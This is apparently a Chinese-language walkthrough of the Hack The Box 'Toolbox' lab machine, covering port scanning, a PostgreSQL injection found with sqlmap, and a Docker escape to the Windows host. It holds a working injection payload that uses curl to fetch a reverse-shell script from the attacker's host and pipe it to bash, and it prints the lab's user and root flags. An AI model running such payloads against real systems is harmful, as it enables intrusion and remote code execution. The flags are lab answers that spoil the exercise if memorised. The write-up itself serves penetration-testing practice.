[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升

Information Gathering

IP Address Opening Ports
10.10.10.236 TCP:21,22,135,139,443,445,5985,47001,49664,49665,49666,49667,49668,49669

$ ip='10.10.10.236'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b1aa18199eaf79602192e6e97045a3f (RSA)
|   256 a24b5ac70ff399a13aca7d542876b2dd (ECDSA)
|_  256 ea08966023e2f44f8d05b31841352339 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.38 ((Debian))
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.38 (Debian)
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after:  2021-02-17T17:45:56
|_http-title: MegaLogistics
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PostgreSQL Injection RCE

# echo '10.10.10.236 megalogistic.com admin.megalogistic.com'>>/etc/hosts

https://megalogistic.com/

https://admin.megalogistic.com/

复制代码
POST / HTTP/1.1
Host: admin.megalogistic.com
Cookie: PHPSESSID=4b2a7fb20b42bc87c66dac68719ea178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin.megalogistic.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: https://admin.megalogistic.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=admin'&password=1

$ python3 /opt/sqlmap/sqlmap.py -u http://admin.megalogistic.com --batch --force-ssl --dbms=PostgreSQL -X POST --data 'username=admin&password=11111'

复制代码
POST / HTTP/1.1
Host: admin.megalogistic.com
Cookie: PHPSESSID=4b2a7fb20b42bc87c66dac68719ea178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin.megalogistic.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: https://admin.megalogistic.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=';COPY+(SELECT+'test')+TO+PROGRAM+'curl+10.10.16.33/reverse.sh|bash';--+-&password=1

User.txt

f0183e44378ea9774433e2ca6ac78c6a

Privilege Escalation:Docker Escape boot2docker

$ uname -a

$ SHELL=/bin/bash script -q /dev/null

postgres@bc56e3cc55e9:/tmp$ ssh docker@172.17.0.1

docker@box:~$ cat /c/Users/Administrator/Desktop/root.txt

Root.txt

cc9a0b76ac17f8f475250738b96261b3

相关推荐
群联云防护小杜4 分钟前
深度隐匿源IP:高防+群联AI云防护防绕过实战
运维·服务器·前端·网络·人工智能·网络协议·tcp/ip
退役小学生呀18 分钟前
十五、K8s可观测能力:日志收集
linux·云原生·容器·kubernetes·k8s
van叶~19 分钟前
Linux探秘坊-------15.线程概念与控制
linux·运维·服务器
Andy杨1 小时前
20250718-5-Kubernetes 调度-Pod对象:重启策略+健康检查_笔记
笔记·容器·kubernetes
Andy杨2 小时前
20250718-1-Kubernetes 应用程序生命周期管理-应用部署、升级、弹性_笔记
linux·docker·容器
别致的影分身8 小时前
Docker 镜像原理
运维·docker·容器
阿葱(聪)8 小时前
java 在k8s中的部署流程
java·开发语言·docker·kubernetes
指月小筑8 小时前
K8s 自定义调度器 Part1:通过 Scheduler Extender 实现自定义调度逻辑
云原生·容器·kubernetes·go
庸子9 小时前
Ansible & AWX 自动化运维
运维·自动化·ansible
斯是 陋室9 小时前
在CentOS7.9服务器上安装.NET 8.0 SDK
运维·服务器·开发语言·c++·c#·云计算·.net